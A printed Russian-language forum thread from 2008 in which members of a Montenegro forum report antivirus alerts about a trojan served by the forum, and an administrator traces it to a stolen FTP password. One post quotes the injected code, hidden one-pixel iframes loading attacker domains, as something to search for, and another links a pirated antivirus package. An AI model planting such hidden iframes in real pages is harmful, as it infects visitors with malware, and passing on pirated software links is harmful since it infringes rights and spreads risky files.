Версия для печати темы

Нажмите сюда для просмотра этой темы в оригинальном формате

Форум о Черногории _ Разговоры ни о чём :-) _ Троян на форуме!

Автор: Егор 20 Mar 2008, 08:54

Будьте внимательны.
Вчера при заходе на форум ко мне в комп пытался прорваться троян!

Вот сообщение Касперского:

The requested URL [url=http://www.crnagora.ru/forum[/url] is infected with Trojan-Clicker.HTML.IFrame.ab virus

Автор: basill 20 Mar 2008, 09:08

Цитата(Егор @ 20 Mar 2008, 17:54) *

Будьте внимательны.
Вчера при заходе на форум ко мне в комп пытался прорваться троян!

Вот сообщение Касперского:

The requested URL [url=http://www.crnagora.ru/forum[/url] is infected with Trojan-Clicker.HTML.IFrame.ab virus

подтверждаю!!!

Автор: Черногорка 20 Mar 2008, 11:29

Цитата(basill @ 20 Mar 2008, 10:08) *

подтверждаю!!!


Точно, на меня пытался напасть!

Автор: Пенсионер 20 Mar 2008, 11:33

Local Settings\Temporary Internet Files\Content.IE5\IM3SWQR2\in[1].htm\JavaScript.0 - инфицирован Trojan.DownLoader.50222

Это Веб сказал....-с последнего сохраненного поста!....делать то что?

Автор: Егор 20 Mar 2008, 12:36

QUOTE(Пенсионер @ 20 Mar 2008, 11:33) *

Local Settings\Temporary Internet Files\Content.IE5\IM3SWQR2\in[1].htm\JavaScript.0 - инфицирован Trojan.DownLoader.50222

Это Веб сказал....-с последнего сохраненного поста!....делать то что?


Запустить полную проверку компа антивирусом и уничтожить если что-то обнаружится.

Автор: НастяС 20 Mar 2008, 12:48

Цитата(Егор @ 20 Mar 2008, 12:36) *

Запустить полную проверку компа антивирусом и уничтожить если что-то обнаружится.

Спасибо за предупреждение.

Автор: A+A 20 Mar 2008, 17:11

Рекомендую всем соблюдать максимальные меры предосторожности при работе на форму. К сожалению, по техническим причинам мы не сможем решить проблему быстро.

Автор: Алексей Блынский 20 Mar 2008, 17:34

Цитата(A+A @ 20 Mar 2008, 18:11) *

Рекомендую всем соблюдать максимальные меры предосторожности при работе на форму. К сожалению, по техническим причинам мы не сможем решить проблему быстро.



В случае обнаружения следов вируса необходимо выполнить
следующие действия с обязательным соблюдением порядка:

1. Удалить вирусное содержимое со страниц вашего сайта.
2. Обновить свою антивирусную программу и проверить локальный компьютер на наличие вирусов.
3. Зайти в панель управления хостинг-аккаунтом
и изменить пароль на пользователя FTP.

Я так думаю у кого-то из админов, вирус сидел на компе, вот и ушел пароль от FTP.
Удачи в лечении.


на страницах нужно искать примерно такое
----
<body bgColor=#CCCCCC leftMargin=0 topMargin=0 marginheight="0" marginwidth="0"><iframe src=http://dorzentovan.com/sp/ frameborder=0 width=1 height=1 scrolling=no></iframe>
----
или
----
<iframe src=http://dorzentovan.com/sp/ frameborder=0 width=1 height=1 scrolling=no></iframe><iframe src=http://dkfjkdkjsl.com/spk2/ frameborder=0 width=1 height=1 scrolling=no></iframe>
----

Еще раз удачи

Автор: saaaab 20 Mar 2008, 21:13

Цитата(Алексей Блынский @ 20 Mar 2008, 17:34) *



Я так думаю у кого-то из админов, вирус сидел на компе, вот и ушел пароль от FTP.
Удачи в лечении.


Ага. Два дня назад snoop передал бразды правления, если не ошибаюсь, А+А.
Возможно, конечно, совпадение, но...
Сегодня еле запустил комп, и вижу, что из компа все выгружает троян

Автор: A+A 20 Mar 2008, 22:10

QUOTE(saaaab @ 20 Mar 2008, 21:13) *

Ага. Два дня назад snoop передал бразды правления, если не ошибаюсь, А+А.
Возможно, конечно, совпадение, но...
Сегодня еле запустил комп, и вижу, что из компа все выгружает троян

У модераторов нет доступа к прову по FTP.

Автор: Граф Монтенегро 20 Mar 2008, 23:30

Цитата(Егор @ 20 Mar 2008, 08:54) *

Будьте внимательны.
Вчера при заходе на форум ко мне в комп пытался прорваться троян!

Вот сообщение Касперского:

The requested URL [url=http://www.crnagora.ru/forum[/url] is infected with Trojan-Clicker.HTML.IFrame.ab virus


Да покажите же мне этот вирус наконец. Хобби у меня просто, вирусное (разбираться что и как). smile.gif Весь форум облазил, ничто прицепиться не пытается. У меня антивирус AVIRA, если что. Просканил и DrWebом. Причем загружался с LiveCD.

Автор: Егор 21 Mar 2008, 08:43

Да чего его показывать? Вчера вечером опять этот вирус грузился. Да проблем нет, Касперский его убивает у меня и дальше все работает. Не проблема. Зачем антивирус то обновлять если он и так новый и сам обновляется? Что то вы все усложняете. Поставьте антивирус нормальный и непиратский с неворованными ключами и все наладится.

Автор: Александар 21 Mar 2008, 14:20

QUOTE(Граф Монтенегро @ 20 Mar 2008, 23:30) *

Да покажите же мне этот вирус наконец. Хобби у меня просто, вирусное (разбираться что и как). smile.gif Весь форум облазил, ничто прицепиться не пытается. У меня антивирус AVIRA, если что. Просканил и DrWebом. Причем загружался с LiveCD.

выйдите с форума и войдите. при нажатии ВОЙТИ он и прицепляется.
пару дней назад Касперский его ловил, Dr.Web молчал. а сегодня и Dr.Web нашел этого Trojan.DownLoader.50222

Автор: Граф Монтенегро 21 Mar 2008, 14:34

Цитата(Егор @ 21 Mar 2008, 08:43) *

Да чего его показывать? Вчера вечером опять этот вирус грузился. Да проблем нет, Касперский его убивает у меня и дальше все работает. Не проблема. Зачем антивирус то обновлять если он и так новый и сам обновляется? Что то вы все усложняете. Поставьте антивирус нормальный и непиратский с неворованными ключами и все наладится.


Да хобби у меня внутри вирусов копаться самому, а не антивирусом.

А про обновление не понял, я вроде про такое ничего не писал. У меня всегда сами антивирусы обновляются (AVIRA Antivir и Dr. Web). И с родными лицензионными ключиками. Неужто думаете, Граф не может позволить себе купить? biggrin.gif У меня и Windows и Office легальные.

Цитата(Александар @ 21 Mar 2008, 14:20) *

выйдите с форума и войдите. при нажатии ВОЙТИ он и прицепляется.
пару дней назад Касперский его ловил, Dr.Web молчал. а сегодня и Dr.Web нашел этого Trojan.DownLoader.50222


Не получилось, Александар. Несколько раз пробовал и процессы мониторил. Ну да пес с ним.

Автор: Алексей Блынский 21 Mar 2008, 15:50

Цитата(Граф Монтенегро @ 21 Mar 2008, 15:34) *

Да хобби у меня внутри вирусов копаться самому, а не антивирусом.


Так отключите антивирус, файрволл, заходите на форум и копайтесь на здоровье. smile.gif

Автор: Пенсионер 23 Mar 2008, 00:00

Троян=пропал!? Нет предупреждающей надписи... ура!? huh.gif Однако у меня сохранилась странная "функция"=изменять любой свой старый пост!!! Хоть за прошлый год! Хоть вообще стирать! (и все эти изменения-сохраняются в форуме!) (раньше-после сл. поста-функ. "изменить" автоматически закрывалась, а сейчас=все открыто) У вас так же? blink.gif

Автор: Vernad 23 Mar 2008, 00:17

Пенсионер спасибо за информацию.Удалил один из моих постов.

Автор: Пенсионер 23 Mar 2008, 00:47

Цитата(Vernad @ 23 Mar 2008, 09:17) *

Пенсионер спасибо за информацию.Удалил один из моих постов.

Это все хорошо=все мы задним умом с удовольствием что-то исправили бы... но , это разрушит связь! Ответы (пусть даже ругательные)-потеряют смысл.... Админ, прикрой форум и разберись!!!! mad.gif Или в Спорт-лото жалобу на вас писать!?

Автор: Vladimir 23 Mar 2008, 01:34

Цитата(Пенсионер @ 23 Mar 2008, 00:47) *

Или в Спорт-лото жалобу на вас писать!?

http://rapidshare.com/files/100696191/ESET_NOD32_Antivirus_3.0.645_Business_Edition_2B.rar
Не пропускает. Можно ставить - да простят меня приверженцы только лицензионок. Без закидонов, ставлю, по-возможности, лицензионные версии (в России), меньше проблем, но здесь - труднее. Кстати, при возвращении моих флешок от местных знакомых после "их офисов" - троян, как минимум, "има". Знаю, что есть проблема в "распознавалке" сербско-хорватского" с факса и пр., помогу в FR 9.0 Prof и др. Просто вышлю-выложу для ЧГ коммьюнити...

Автор: Кумборец 23 Mar 2008, 17:22

Цитата(Пенсионер @ 23 Mar 2008, 00:00) *

Троян=пропал!? Нет предупреждающей надписи... ура!? huh.gif ...


Увы нам! Никуда троян не пропал. Визжит дурным голосом, когда Касперский его выкусывает smile.gif

Автор: Vladimir 23 Mar 2008, 18:39

Цитата(Кумборец @ 23 Mar 2008, 17:22) *

Увы нам! Никуда троян не пропал. Визжит дурным голосом, когда Касперский его выкусывает smile.gif

У меня не визжит, но "выкусывает". Замечу, только в Экслорере, в Опере ничего не определяется.

Автор: Dimus 26 Mar 2008, 02:06

Проблемы с трояном действительно были. Исправили

Интересна прична. Кто-то из администраторов "потерял" логин/пароль и таким образом злоумышленники получили доступ к форуму, без его взлома. Скрипты форума были модифицированы, был добавлен код, чтобы тот кто запрашивает форум ходил еще на другой сайт за трояном.
В настоящий момент пароли ФТП нами изменены. Администраторам и модераторам срочно необходимо самим изменить свои личные пароли.

Внимание модераторам!
Администрация планирует структурную модернизацию форума. Пожалуйста свяжитесь с Дмитрием (Dimus) dm(at)coline.ru для обсуждения новой структуры разделов и правил форума.